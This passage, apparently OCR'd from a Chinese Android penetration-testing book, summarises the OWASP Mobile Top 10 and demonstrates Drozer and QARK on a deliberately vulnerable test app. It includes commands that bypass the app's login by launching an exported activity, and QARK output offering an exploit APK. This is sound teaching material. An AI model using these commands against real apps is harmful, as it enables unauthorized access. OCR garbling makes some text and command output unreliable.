或 者 SOAP API 接 口 来 连接 后 台 服 务 器 。 移动 应 用 的 安全 原则 和 传统 Web 服 务 器 以 及 Web 应 用 的 安 
全 原则 相同 ， 因 为 我 们 只 是 使 用 了 不 同 的 前 端 (移动 客户 端 )， 而 后 端 还 是 相同 的 。 常 见 的 攻击 
向 量 包括 找 出 暴露 的 API 入 口 ,查找 各 种 漏洞 ,利用 配置 错误 的 服务 器 等 。 几 乎 所 有 传统 的 OWASP 
十 大 漏洞 都 存在 这 种 情况 。 


45.3 M2: 不 安全 的 数据 存储 
开发 者 会 假定 攻击 者 无 法 访问 所 有 存储 在 设备 文件 系统 上 的 数据 。 基 于 这 一 假设 , 开发 者 经 
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常会 通过 共享 首选 项 或 者 SQLite 数 据 库 将 敏感 数据 存放 在 设备 的 文件 系统 中 ， 比 如 用 户 名 、 身 份 
验证 令 牌 、 密 码 、PIN 码 、 生 日 以 及 住址 等 个 人 信息 。 有 多 种 方法 可 以 访问 存储 在 设备 本 地 上 的 
数据 。 常 见 的 技术 包括 ROOT 设备 ， 然 后 访问 这 些 数据 ， 或 者 使 用 基于 备份 文件 的 攻击 等 ,我 们 


将 在 下 一 章 介绍 这 些 技术 。 




















45.4 M3: 传输 层 保护 不 足 


在 刚才 的 图 中 ， 我 们 发 现 “传输 层 保护 不 足 ” 排 在 第 三 位 。 和 Web 应 用 相似 ， 移 动 应 用 可 能 
通过 不 安全 的 网 络 传输 敏感 信息 ， 引 发 严重 的 攻击 。 人 们 经 常 在 咖啡 店 和 机 场 连接 开放 的 Wi-Fi， 
在 这 些 地 方 ， 恶 意 攻击 者 可 以 通过 中 间 人 攻击 来 窃取 连接 这 些 网 络 的 用 户 的 敏感 信息 。 


对 移动 应 用 进行 渗透 测试 时 ,通常 会 通过 网 络 传递 证 书 和 会 话 令 牌 。 所 以 , 我 们 可 以 通过 分 
析 流 量 来 检查 应 用 是 否 通过 网 络 传输 了 敏感 数据 ,这 是 一 个 不 错 的 方法 。 还 有 一 个 重要 的 情况 是 ， 
应 用 的 大 部 分 模块 都 是 易 受 攻击 的 。 如 果 应 用 需要 通过 HTTPS 进 行 认 证 ， 并 通过 HTTP 发 送 认证 
cookies， 那 么 这 个 应 用 就 容易 受到 攻击 ， 因 为 攻击 者 很 容易 获取 通过 HTTP 传 递 的 认证 cookies， 
而 这 些 cookies 与 用 户 名 和 密码 一 样 强大 , 都 可 以 登录 应 用 。 缺乏 证 书 验证 和 弱 握 手 协议 也 是 传输 
层 安 全 协议 中 常见 的 问题 。 

























































































45.5 M4: 意外 的 数据 泄漏 


如 果 应 用 把 用 户 或 者 其 他 地 方 的 敏感 信息 当 作 输 入 , 就 可 能 导致 这 些 数据 被 存放 到 设备 中 的 
一 个 不 安全 位 置 上 。 设备 中 的 其 他 恶意 应 用 有 可 能 访问 这 个 不 安全 的 位 置 , 最 终 使 设备 处 于 高 风 
险 之 中 。 在 严重 的 攻击 下 , 代码 将 变 得 脆弱 不 堪 , 因为 利用 这 些 侧 信道 数据 泄漏 的 漏洞 非常 容易 。 
攻击 者 只 需 编写 一 段 简短 的 代码 ， 然 后 就 能 访问 敏感 信息 。 我 们 甚至 可 以 使 用 aap 等 工具 就 能 访 
问 这 些 存 储 位 置 。 


下 面 是 可 能 导致 数据 泄漏 的 几 种 情形 。 


口 内 容 提供 程序 泄漏 

D 复制 与 粘贴 缓存 

口 调试 日 志 

口 URL 缓 存 

口 浏览 器 cookies 

口 发 送 给 第 三 方 的 分 析 数 据 












































4.5.6 M5: 糟糕 的 授权 和 身份 认证 
移动 应 用 和 设备 的 易 用 性 指标 与 传统 的 Web 应 用 和 笔记 本 电脑 不 同 。 考虑 到 移动 设备 的 输入 
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形式 ， 它 的 PIN 码 和 密码 通常 都 比较 短 。 基 于 实用 性 的 考量 ， 移 动 应 用 的 认证 和 传统 的 Web 认 证 
方案 也 不 相同 。 ee 的 措施 , 攻击 者 很 容易 就 能 暴力 破解 应 用 中 这 些 较 短 的 PIN 码 。 
我 们 可 以 向 服务 器 发 送 恶意 的 请 求 , 并 观察 这 些 请 求 是 否 得 到 响应 来 尝试 访问 应 用 更 高 权限 的 功 
能 ， 这 样 就 可 以 测试 糟糕 ww o 





























4.5.7 M6: 被 破解 的 加 密 技术 


如 果 开 发 者 想 在 应 用 中 使 用 加 密 技 术 , 就 会 涉及 加 密 技 术 破解 的 问题 。 有 多 种 原因 导致 安 卓 
应 用 的 加 密 技术 能 够 被 破解 ，OWASP 移 动 应 用 十 大 风险 中 提 到 了 下 面 两 个 主要 原因 。 


o 使 用 较 弱 的 算法 来 进行 加 密 和 解密 ， 包括 使 用 有 重大 漏洞 的 算法 或 者 不 满足 现代 安全 要 
求 ， 比 如 DES、3DES 等 。 

O 使 用 强加 密 算法 ， 但 实现 方式 不 安全 : 包括 在 本 地 数据 库 中 存储 密 钥 ， 将 密 钥 硬 编码 到 
代码 中 等 。 





























45.8 M7: 客户 端 注入 

客户 端 注入 的 结果 是 ,可 以 通过 应 用 在 移动 设备 上 执行 恶意 代码 。 通常 ， 恶意 代码 通过 不 同 
的 方式 借助 威胁 代理 输入 到 移动 应 用 中 。 

下 面 是 安 卓 应 用 中 客户 端 注 人 攻击 的 一 些 例子 : 


口 WebView 注 入 ; 

口 通过 原始 SQL 语句 对 SQLite 数 据 库 进 行 传 统 的 SQL 注入 ; 
口 内 容 提 供 程序 SQL 注入 ; 

口 内 容 提 供 程序 路 径 遍 历 。 


















































4.5.9 M8: 通过 不 受信 任 的 输入 进行 安全 决策 


开发 者 应 该 假设 未 授权 的 用 户 可 以 通过 不 正确 的 输入 过 度 使 用 应 用 的 敏感 功能 。 特 别 是 安 卓 
平台 ， 攻 击 者 可 以 拦截 调用 ( 进程 间 通 信 或 Web 服 务 调用 )， 并 算 改 其 中 的 敏感 参数 。 不 能 实现 
这 类 功能 就 会 导致 应 用 产生 错误 ， 甚 至 让 攻击 者 获得 更 高 的 权限 。 使 用 不 正确 的 Intent 调 用 敏感 
的 activity 就 是 例子 之 一 。 
































4.5.10 M9: 会 话 处 理 不 当 


移动 应 用 使 用 诸如 SOAP 或 REST 一 类 的 协议 来 连接 服务 器 。 它 们 都 是 无 状态 协议 ， 当 移动 客 
户 端 应 用 使 用 这 些 协议 时 , 客户 端 会 在 身份 验证 完成 后 从 服务 咒 获 得 一 个 令 牌 。 用 户 在 会 话 期 间 
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将 会 使 用 这 个 令 牌 ，OWASP 的 “会 话 处 理 不 当 ?” 就 是 指 攻击 和 保护 这 些 会 话 。 这 个 令 牌 在 客户 端 
失效 后 ， 却 没有 服务 器 上 失效 ,这 是 移动 应 用 的 一 个 常见 问题 。 通常， 应 用 收 到 的 这 个 令 牌 会 通 
过 共享 首选 项 或 SQLite 数 据 库存 放 在 客户 端的 文件 系统 中 。 一 旦 恶意 用 户 获得 了 这 个 令 牌 , 而 服 
务 器 没有 及 时 证 这 个 令 牌 失效 , 那么 他 就 可 以 随时 使 用 这 个 令 牌 。 其 他 可 能 出 现 的 情况 包括 会 话 
超时 、 弱 令 牌 创建 以 及 过 期 令 牌 等 。 














4.5.11 M10: 缺乏 二 进 制 文件 保护 


逆向 工程 是 大 部 分 安 卓 应 用 最 常见 的 问题 之 一 。 攻击 者 得 到 应 用 的 二 进 制 文件 后 , 首先 会 反 
编译 或 者 拆 解 这 个 应 用 。 攻 击 者 通过 这 种 方式 可 以 查看 硬 编 码 的 密 钥 ,查找 漏洞 ,其 至 通过 重新 
打包 拆 解 后 的 应 用 来 修改 应 用 的 功能 ,虽然 混淆 源 代码 并 不 难 ,但 是 大 部 分 的 应 用 并 没有 这 人 么 做 。 
如 果 没 有 对 源 代码 进行 混淆 ， 攻 击 者 只 需 使 用 一 个 合适 的 工具 就 能 完成 这 些 工 作 ， 比 如 apktool 
或 dex2jar。 虽 然 有 些 应 用 会 检测 设备 的 root 状 态 ,但 是 通过 对 应 用 进行 逆向 工程 或 者 hook 应 用 流 
程 就 能 绕 开 这 些 检测 。 


| 参考 文献 : https:/www.owasp.org/index.php/Projects/OWASP Mobile Security | 
A 

















































































































Project_- Top Ten Mobile Risks。 





46 自动 化 工具 


虽然 本 书 主要 介绍 概念 而 不 是 工具 , 但 自动 化 工具 通常 会 在 渗透 测试 中 节约 时 间 。 下 面 是 一 
些 最 常用 的 安 章 应 用 自动 化 评估 工具 。 

Drozer 和 Quak 是 两 款 可 能 会 在 安 卓 应 用 评估 中 使 用 到 的 工具 。 

我 们 将 讨论 多 种 技术 ， 比 如 hook 应 用 进程 、 进 行 运行 时 控制 、 逆 向 工程 、 手 动 查 找 和 利用 


漏洞 等 。 然 而 ， 为 了 让 读者 开始 解 应 用 评估 ， 这 一 部 分 将 主要 讨论 如 何 使 用 自动 化 工具 Drozer 
和 Quark。 





























4.6.1 Drozer 


Drozer 是 一 个 由 MWR 实 验 室 开发 的 安 章 安全 评估 框架 。 在 撰写 本 书 时 , Drozer 是 用 于 安 卓 安 
全 评估 的 最 佳 工具 。 根据 Drozer 的 官方 文档 介绍 ,“Drozer 可 以 把 你 当 作 一 款 安 卓 应 用 , 通过 安 卓 
的 进程 间 通 信 机 制 和 操作 系统 与 其 他 应 用 进行 交互 。” 


在 Web 领 域 中 ， 使 用 大 部 分 自动 安全 评估 工具 时 ， 我 们 需要 提供 目标 应 用 的 细节 ， 然 后 去 喝 
一 杯 咖 啡 ， 回 来 再 取 报 告 。 不 同 于 普通 的 自动 化 扫描 器 ，Drozer 是 交互 式 的 。 用 户 使 用 Drozer 进 
行 安全 评估 时 ， 需 要 在 工作 站 控制 台 运 行 命令 ， 然 后 Drozer 把 这 些 命令 发 送 给 设备 的 代理 ， 进 而 
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执行 相关 的 任务 。 
Drozer 的 安装 步 又 已 经 在 第 1 章 中 介绍 过 了 。 
首先 ， 启 动 Drozer 终 端 ， 如 下 图 所 示 。 








srini@srini:~$ drozer console connect 
Selecting 8b4345b2d9047f21 (unknown Android SDK built for x86 4.4.2) 


Pr | 
Mt ok. adaha z «sshd 
.idsnemesisand. .pr 
“Otero and ro an 
.,Sisandprotectorandroids+. 
..nemesisandprotectorandroidsn: . 
.emesisandprotectorandroidsnemes. . 
..isandp,..,rotectorandro,..,idsnem. 
-isisandp..rotectorandroid..snemisis. 
,andprotectorandroidsnemisisandprotec. 
. torandroidsnemesisandprotectorandroid. 
. snemisisandprotectorandroidsnemesisan: 
.dprotectorandroidsnemesisandprotector. 


drozer Console (v2.3.3) 
dz> J 











46.2 ”使 用 Drozer 进行 安 卓 安全 评估 


这 一 部 分 将 简要 介绍 如 何 使 用 Drozer 进 行 安全 评估 ,并 通过 举例 说 明 的 形式 介绍 如 何 利 用 导 
出 的 activity 漏 洞 。 在 本 书 的 后 续 章 节 中 ,我 们 将 更 加 详细 地 讨论 这 些 漏洞 。 


我 们 可 以 在 真 机 或 模拟 器 中 安装 测试 应 用 。 在 这 里 ， 我 使 用 模拟 器 进行 演示 。 





1. 安装 测试 应 用 
使 用 下 面 的 命令 安装 testapp 应 用 。 


srini@srini:~$ adb install testapp.apk 
d3993 KB/s (743889 bytes in 0.181s) 





pkg: /data/local/tmp/testapp.apk 
Success 
srini@srini:~$ dj 











本 例 使 用 的 testapp.apk 中 有 一 个 导出 的 activity。 
设备 上 的 其 他 应 用 可 以 启动 导出 的 activity。 我 们 来 看 一 下 如 何 使 用 Drozer 对 这 个 应 用 进行 安 
全 测试 。 

下 面 是 一 些 在 Drozer 中 有 用 的 命令 。 
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2. 列 出 所 有 的 模块 


dz> list 


上 面 的 命令 可 以 列 出 Drozer 在 当前 会 话 中 能 够 执行 的 全 部 模块 。 











dz> List 

app.activity.forintent Find activities that can handle the given intent 
app.activity.info Gets information about exported activities. 
app.activity.start Start an Activity 

app.broadcast.info Get information about broadcast receiver 
app.broadcast.send Send broadcast using an intent 

app. package. attacksurface Get attack surface of package 





上 图 显示 了 能 够 使 用 的 模块 ( 为 了 更 简洁 ， 图 中 删 减 了 部 分 内 容 )。 
3. 检索 软件 包 信息 
使 用 下 面 的 命令 可 以 列 出 模拟 器 上 已 安装 的 全 部 软件 包 。 


dz> run app.package.list 














dz> run app.package. list 

com. isi.contentprovider (ContentProvider) | 
com.android.soundrecorder (Sound Recorder) 
com.android.sdksetup (com.android.sdksetup) 
com.android. launcher (Launcher) 
com.android.defcontainer (Package Access Helper) 
com.android.smoketest (com.android.smoketest) 
[com.isi.testapp (testapp) 
com.android.quicksearchbox (Search) 





























a 


上 而 的 输出 有 删 减 。 


要 想 找 出 某 一 应 用 的 包 名 ， 可 以 使 用 -f 参 数 加 上 我 们 要 查找 的 字符 串 。 


dz> run app.package.list -f [要 查找 的 字符 囊 ] 








dz> run app.package.list -f testapp 
com.isi.testapp (testapp) 
dz> 























如 上 图 所 示 ， 我 们 的 目标 应 用 是 com.isi.testapp。 
可 以 使 用 下 面 的 命令 来 查看 这 个 软件 包 的 基本 信息 。 





dz> run app.package.info -a [ 包 名 ] 
本 例 使 用 的 命令 如 下 。 


dz> run app.package.info -a com.isi.testapp 
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dz> run app.package.info -a com.isi.testapp 
Package: com.isi.testapp 

Application Label: testapp 

Process Name: com.isi.testapp 

Version: 1.0 

Data Directory: /data/data/com.isi.testapp 

APK Path: /data/app/com.isi.testapp-1.apk 

UID: 10052 

GID: None 

Shared Libraries: null 

Shared User ID: null 

Uses Permissions: 

- None 

Defines Permissions: 

- None 








dz J 





我 们 可 以 看 到 关于 这 个 应 用 的 很 多 信息 。 上 面 的 输出 显示 了 应 用 数据 在 文件 系统 中 的 存放 路 
径 、APK 路 径 、 是 否 存 在 共享 用 户 名 ， 等 等 。 
4.7 识别 攻击 面 


本 节 是 在 使 用 Drozer 的 过 程 中 最 有 趣 的 部 分 之 一 , 我们 通过 一 个 简单 的 命令 就 能 识别 出 目标 
应 用 的 攻击 面 。 它 能 提供 很 多 细节 ， 比 如 应 用 组 件 是 否 是 导出 的 、 应 用 是 否 可 以 调试 ， 等 等 。 


我 们 来 查找 testapp.apk 的 攻击 面 。 可 以 使 用 下 面 的 命令 来 查找 某 一 软件 包 的 攻击 面 。 


























dz> run app.package.attacksurface [ 包 名 ] 


在 testapp.apk 这 个 例子 中 ， 使 用 的 命令 如 下 。 





dz> run app.package.attacksurface com.isi.testapp 





dz> run app.package.attacksurface com.isi.testapp 
Attack Surface: 

activities exported 

broadcast receivers exported 

content providers exported 

services exported 

i debuggable 


N 


coo 








dz> 





如 上 图 所 示 ，testapp 应 用 有 两 个 导出 的 activity。 现 在 ， 我 们 需要 找 出 这 两 个 activity 的 名 字 ， 
并 确认 它们 是 否 属于 敏感 的 activity。 我 们 可 以 使 用 现 有 的 Drozer 模 块 来 进行 进一步 查找 它 。 这 个 
应 用 是 可 以 调试 的 , 这 意味 着 我 们 可 以 把 这 个 进程 连接 到 调试 器 上 , 逐一 地 调试 每 一 条 指令 ,其 
至 可 以 在 这 个 进程 上 运行 任意 的 代码 。 








使 用 Drozer 识别 并 利用 安 卓 应 用 漏洞 
接 下 来 ， 我 们 来 研究 通过 识别 目标 应 用 的 攻击 面 所 得 到 的 结果 。 
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1. 攻击 导出 的 activity 
在 这 一 部 分 中 ， 我 们 将 更 加 深入 地 研究 testapp.apk 文 件 ， 从 而 识别 和 利用 它 的 漏洞 


由 上 文 可 知 ,这 个 应 用 有 一 个 导出 的 activity。 为 了 识别 当前 软件 包 中 activity 的 名 称 ， 我 们 可 
以 使 用 下 面 的 命令 。 





dz> run app.activity.info -a [ 包 名 ] 
本 例 使 用 的 命令 如 下 。 


dz> run app.activity.info -a com.isi.testapp 





dz> run app.activity.info -a com.isi.testapp 

Package: com.isi.testapp 
com.isi.testapp.MainActivity 
com.isi.testapp.Welcome 


d 
2i à 4 


在 前 面 的 图 中 ， 我 们 可 以 查看 目标 应 用 中 的 activity 列 表 。 显 然 ，com.isi.testapp.MainActivity 
是 应 用 的 主 界面 , 它 应 该 是 导出 的 ， 这样 才能 正常 启动 。 而 com.isi.testapp.Welcome 看 起 来 像 是 用 
户 登 录 之 后 的 activity 的 名 称 。 下 面 ， 我 们 使 用 Drozer 来 尝试 启动 它 。 


dz> run app.activity.start --component [ 包 名 ] [组 件 名 ] 


本 例 使 用 的 命令 如 下 。 



































dz> run app.activity.start -component com.isi.testapp com.isi.testapp.Welcome 





dz> run app.activity.start --component com.isi.testapp com.isi.testapp.Welcome 
dz> 














上 述 命令 在 后 台 生 成 了 一 个 合适 的 Intent 来 启动 activity， 这 和 前 文中 使 用 Activity Manager T. 
有 具 来 启动 activity 类 似 。 下 图 是 由 Drozer 启 动 后 的 界面 。 


is testapp 

















nm 























PRIVATE AREA 
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很 明显 ， 我 们 绕 过 了 用 于 登录 应 用 的 身份 验证 。 
2. 这 里 存在 什么 问题 


如 前 文 所 述 ， 在 AndroidManifest.xml 文 件 中 ， 这 个 activity 组 件 的 android:exported 属 性 设 
置 成 true o 











<activity android:name="com.isi.testapp.Welcome" 
android:exported="true"> 


</activity> 














本 节 简 要 介绍 了 如 何 使 用 Drozer 进 行 安 卓 应 用 渗透 测试 。 在 后 面 的 章节 中 ， 我 们 将 介绍 更 复 
杂 的 漏洞 以 Snes SS 这 些 漏洞 。 








4.8 QARK 


根据 RARK 官 网 的 介绍 ,“ 就 其 核心 而 言 , QARK 是 一 款 静 态 代 码 分 析 工 具 , 可 以 识别 潜在 的 
安全 漏洞 以 及 使 用 Java 开 发 安 卓 应 用 时 的 注意 事项 。QARK 是 基于 社区 设计 的 ， 并 且 人 人 都 能 
PAEH o QARK 能 够 将 安 卓 应 用 的 潜在 安全 风险 告知 开发 者 及 信息 安全 人 员 , 详细 描述 各 种 问题 ， 
并 且 提 供 权威 参考 资料 链接 。QARK 还 尝试 提供 动态 生成 的 ADB 命 令 来 验证 检测 到 的 潜在 漏洞 。 
只 要 条 件 允 许 , 它 其 至 会 动态 生成 一 个 定制 的 测试 应 用 , 以 现成 的 APK 文 件 形式 来 演示 它 发 现 的 
潜在 问题 ”。 


QARK 的 安装 说 明 在 第 1 章 中 已 经 介绍 过 了 。 
本 节 将 介绍 如 何 使 用 QARK 进 行 安 卓 应 用 评估 。 
QARK 有 两 种 模式 : 

口 交互 模式 

口 无 颖 模式 


交互 模式 允许 用 户 逐 一 地 选择 交互 选项 , 而 无 颖 模式 则 允许 用 户 使 用 一 条 单独 的 命令 来 完成 
全 部 工作 。 












































4.8.1 ”以 交互 模式 运行 QARK 
导航 至 QARK 目 录 ， 并 运行 下 面 的 命令 。 








python gqark.py 


QARK 将 以 交互 模式 启动 ， 如 下 图 所 示 。 


4.8 QARK 








“d88888b d8888 8888888b. 888 d8P 
d88P" "Y88b d88888 888 Y88b 888 d8P 
888 888 d88P888 888 888 888 d8P 
888 888 d88P 888 888 d88P  888d88K 
888 888 d88P 888 8888888P" 8888888b 


888 Y8b 888 d88P 888 888 T88b 888 Y88b 
Y88b. Y8b88P d8888888888 888 T88b 888  Y88b 
“Y888888" d88P 888 888  T88b 888 Y88b 
Y8b 


INFO - Initializing... 
INFO - Identified Android SDK installation from a previous run. 
INFO - Initializing QARK 


Do you want to examine: 
[1] APK 
[2] Source 


Enter your choice: 








我 们 可 以 根据 需要 选择 扫描 APK 文 件 或 源 代 码 。 我 选择 扫描 APK 文 件 ， 它 可 以 让 我 们 看 到 
QARK 反 编译 APK 文 件 的 能 力 。 选 择 了 APK 选 项 [1] 之 后 , 我 们 需要 提供 计算 机 上 的 APK 文 件 路 径 
或 者 从 设备 拉 取 APK 文 件 。 这 里 我 们 选择 计算 机 上 的 APK 文 件 路 径 ， 我 将 输入 APK 文 件 路 径 
(testapp.apk )。 








Do you want to examine: 
[1] APK 
[2] Source 


Enter your choice:1 

Do you want to: 

[1] Provide a path to an APK 

[2] Pull an existing APK from the device? 


Enter your choice:1 


Please enter the full path to your APK (ex. /foo/bar/pineapple.apk): 
Path:../testapp.apkl] 











输入 目标 APK 文 件 路 径 后 ， 将 会 提取 出 AndroidManifest.xml 文 件 ， 如 下 图 所 示 。 





Please enter the full path to your APK (ex. /foo/bar/pineapple.apk): 
Path: . ./testapp.apk 

INFO - Unpacking /Users/srinigox98/DowntLoads/testapp.apk 

INFO -~ Zipfile: <zipfile.ZipFile object at 0x10f00c810> 

INFO -~ Extracted APK to /Users/srini®x60/Downloads/testapp/ 

INFO - Finding AndroidManifest.xml in /Users/sriniéx00/Downloads/testapp 
INFO - AndroidManifest.xml found 

Inspect Manifest? ly/n]§} 


选择 输入 y 就 能 查看 提取 出 的 Manifest 文 件 。 














Inspect Manifest? [y/n]ly 

INFO ~ <?xml version="1.0" 7>< 
d="http://schemas. android. com/ap 
<uses-sdk android:minSdkVersion=' 
</uses-sdk> 

<application android:allowBackup="true" android:debuggable="true" android:icon="@7F020000" android: label="@7F@50000" android: th| 
eme="@7F060001"> 

<activity android: label="@7F050000" android: name="com. isi.testapp.MainActivity"> 

<intent-filter> 

<action android: name="android. intent.action.MAIN"> 

</action> 

<category android: name="android, intent. category. LAUNCHER"> 

</category> 

</intent-filter> 

</activity> 

<activity android:exported="true" android:name="com. isi. testapp.Welcome"> 

</activity> 

</application> 

</manifest> 





oid:versionCode="1" android:versionName="1.0" package="com.isi.testapp" xmlns:andro 






android"> 


android: targetSdkVersion="18"> 





Press ENTER key to continuel 











96 第 4 章 安 草 应 用 攻击 概览 





程 





QARK 首 先 会 显示 Manifest 文 件 内 容 ， 然 后 等 竺 用 户 继续 后 面 的 操作 。 按 下 回 车 键 ， 开 始 分 
析 Manifest 文 件 ， 如 下 图 所 示 。 





Press ENTER, key to continue 
INFO - Determined minimum SDK version to be:8 
WARNING — Logs are world readable on pre-4.1 devices. A malicious app could potentially retrieve sensitive data from the logs 


WARNING ~ Backups enabled: Potential for data theft via local attacks via adb backup, if the device has USB debugging enabled ( 
not common). More info: http://developer.android.com/reference/android/R.attr.html#allLowBackup 
POTENTIAL VULNERABILITY - The android:debuggable flag is manually set to true in the AndroidManifest.xml. This will cause your 
application to be debuggable in production builds and can result in data leakage and other security issues. It is not necessary 
to set the android:debuggable flag in the manifest, it will be set appropriately automatically by the tools. More info: http:/ 
/developer.android. -€on/guide/topics/nanifest/application-elenent. htmlé#debug 
INFO ~ Checking pr de 
INFO ~ Checking activity 
WARNING ~ The following activity are exported, but not protected by any permissions. Failing to protect activity could leave th 
em vulnerable to attack by malicious apps. The activity should be reviewed for vulnerabilities, such as injection and informati 
on leakage 

com. isi. testapp.MainActivity 

com.isi.testapp. Welcome 
INFO -~ Checking act 
INFO Checking ser 
INFO Checkin ece s 
Press ENTER key to begin decompilationff 























从 上 图 中 可 以 看 到 ，QARK 发 现 了 几 个 问题 ， 其 中 之 一 是 存在 一 个 潜在 的 漏洞 ， 原 因 在 于 
android:debuggable 的 属性 被 设 为 了 true。QARK 还 针对 前 面 提 到 的 导出 的 activity 问 题 发 出 





H 
警告 s 


完成 对 Manifest 文 件 的 分 析 之 后 ，QARK 开 始 进行 反 编 译 ， 反 编译 可 以 分 析 源 代码 。 按 下 回 
车 键 ， 开 始 反 编译 过 程 ， 如 下 图 所 示 。 











Press ENTER key to begin decompiletion 


ID CORF GAR% AHRSHHHHLSHSHS Hse seARessAKe sess sesssseeees I 
Procyon 23% s##staeessases l 
[二 I 


Decompilation may hang/take too long (usually happens when the source is obfuscatec). 
At ony timc, PRESS C ko continue ond QARK will attempt to run SCA on whatever was decompiled. 
a 




















反 编 译 结束 后 ， 按 下 回 车 键 ， 开 始 分 析 源 代码 。 





ID CORE 100% | HHHHHHHHHHHHHHHHEAHHEHHHEAHHR AHHH AHHH RHH EHH ER H HHH HHH eH EH | 
Procyon 100% | ##HHFHHHHHHEEHEHHEHHHHPHAAHRHE AERA HAHA BHA EAE RHE AHH A HER RAR a EE | 
CFR 100% | HHHHHHHHFHHHHHHHHHAHHHHHHHPHARH BHAA AHAHHAE BAAR AHABHBHABEB RARE RE ARES S | 


Decompilation may hang/take too long (usually happens when the source is obfuscated). 
At any time, Press O to continue and QARK will attempt to run SCA on whatever was decompiled. 





INFO ~ Trying to improve accuracy of the decompiled files 

INFO ~ Restored 3 file(s) out of 3 corrupt file(s) 

INFO ~ Decompiled code found at:/Users/srini®x00/Downloads/testapp 
INFO ~ Finding all java files 

Press ENTER key to begin Static Code Analysis 


下 面 开 始 分 析 源 代码 。 











如 果 反 编译 过 程 由 于 某 些 原因 花费 了 比较 长 的 时 间 ， 我 们 可 以 直接 按 下 C 键 开始 对 反 编 译 
呈 中 已 经 提取 出 的 代码 进行 分 析 。QARK 使 用 了 多 种 工具 来 执行 反 编译 过 程 。 
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Press ENTER key to begin Static Code Analysis 


Crypto issues 32%|######HHHHHHHHHH HH | 
Broadcast issues 35%|######HHHHHHHHHEH EH | 
Webview checks 47% | ######HHHHHHHHeHH HEH HH | 
X.509 Validation 33%|########8HHHHHHEHY | 
Pending Intents 23%|#######H#HHHH | 
File Permissions (check 1) 50%|##########HHHeHHHSH HEHE | 


File Permissions (check 2) 0% | | 











在 前 面 的 图 中 可 以 看 到 ,QARK 启 动 了 源 代码 分 析 功 能 来 识别 代码 中 的 漏洞 。 最 后 生成 了 一 
段 很 长 的 输出 ， 里 面包 含 所 有 可 能 存在 的 问题 ， 如 下 所 示 。 








INFO - This class is exported from a manifest item: MainActivity 
INFO - Checking this file for vulns: /Users/srini0x00/Downloads/testapp/ 
classes_dex2jar/com/isi/testapp/MainActivity.java 


entries: 

onCreate 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 


INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 





ob 


HE 


INFO - This class is exported from a manifest item: Welcome 

INFO - Checking this file for vulns: /Users/srini0x00/Downloads/testapp/ 
classes_dex2jar/com/isi/testapp/Welcome. java 

entries: 

onCreate 

INFO - No custom imports to investigate. The method is assumed to be in the standard 
libraries 

ISSUES - CRYPTO ISSUES 

INFO - No issues to report 

ISSUES - BROADCAST ISSUES 

INFO - No issues to report 

ISSUES - CERTIFICATE VALIDATION ISSUES 

INFO - No issues to report 

ISSUES - PENDING INTENT ISSUES 

POTENTIAL VULNERABILITY - Implicit Intent: localIntent used to create instance of 
PendingIntent. A malicious application could potentially intercept, redirect and/or 
modify (in a limited manner) this Intent. Pending Intents retain the UID of your 
application and all related permissions, allowing another application to act as yours. 
File: 
/Users/srini0x00/Downloads/testapp/classes_dex2jar/android/support/v4/app/TaskStac 
kBuilder.java More details: https://www.securecoding.cert.org/confluence/display/ 
android/DRD21-J.+Always+passt+explicit+intents+to+a+PendingIntent 

ISSUES - FILE PERMISSION ISSUES 

INFO - No issues to report 

ISSUES - WEB-VIEW ISSUES 

INFO - FOUND 0 WEBVIEWS: 

WARNING - Please use the exploit APK to manually test for TapJacking until we have a 
chance to complete this module. The impact should be verified manually anyway, so have 
fun... 

INFO - Content Providers appear to be in use, locating... 

INFO - FOUND 0 CONTENTPROVIDERS: 

ISSUES - ADB EXPLOIT COMMANDS 

INFO - Until we perfect this, for manually testing, run the following command to see 
all the options and their meanings: adb shell am. Make sure to update qark frequently 
to get all the enhancements! You'll also find some good examples here: http://xgouchet. 
fr/android/index.php?article42/launch-intents-using-adb 

==>EXPORTED ACTIVITIES: 

1lcom.isi.testapp.MainActivity 

adb shell am start -a "android.intent.action.MAIN" -n "com.isi.testapp/com.isi. 
testapp.MainActivity" 

2com.isi.testapp.Welcome 

adb shell am start -n "com.isi.testapp/com.isi.testapp.Welcome" 


To view any sticky broadcasts on the device: 
adb shell dumpsys activity] grep sticky 


INFO - Support for other component types and dynamically adding extras is in the works, 
please check for updates 


扫描 结束 后 ，QARK 会 显示 如 下 界面 。 选 择 选项 [1] 可 以 创建 一 个 POC 应 用 ， 这 是 它 特有 的 
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For the potential vulnerabilities, do you want to: 

[1] Create a custom APK for exploitation 

[2] Exit 

Enter your choice:2 

An html report of the findings is located in : /Users/srini®x00/Downloads/qark-master/report/report.html 











此 外 ， 它 还 提供 了 一 些 adb 命 令 来 利用 识别 出 的 问题 。QARK 的 另 一 个 很 好 用 的 功能 是 ， 它 
能 提供 较 好 的 测试 报告 。 


测试 报告 


如 上 图 所 示 ，QARK 生 成 了 一 个 名 为 reporthtml 的 报告 文件 。 我 们 可 以 找到 上 图 中 提供 
径 ， 打 开 reporthtml 文 件 来 查看 测试 报告 。 


QARK 测 试 报告 简单 明了 。 


下 图 显示 了 在 Dashboard 目 录 中 QARK 查 找 出 的 所 有 问题 的 基本 情况 。 4 





3 
m 


的 路 





Information 
STATIC CODE ANALYSIS RESULT 
as 
Manifest 
TOTAL FILES: 541 
App Components JAVA FILES: 191 
Restored 3 file(s) out of 3 corrupt file(s) 
Web Views 


Potential Vulnerabilities Wamings Informational Debug 


File Permissions 


Crypto bugs 


QARK Version 0.9 
Pending Intents 








我 们 首先 来 看 一 下 Manifest 文 件 中 的 漏洞 报告 。 











The android:debuggable flag is manually set to true in the AndroidManifest.xml. This will cause your application to be debuggable in 
production builds and can result in data leakage and other security issues. It is not necessary to set the android:debuggable flag in 
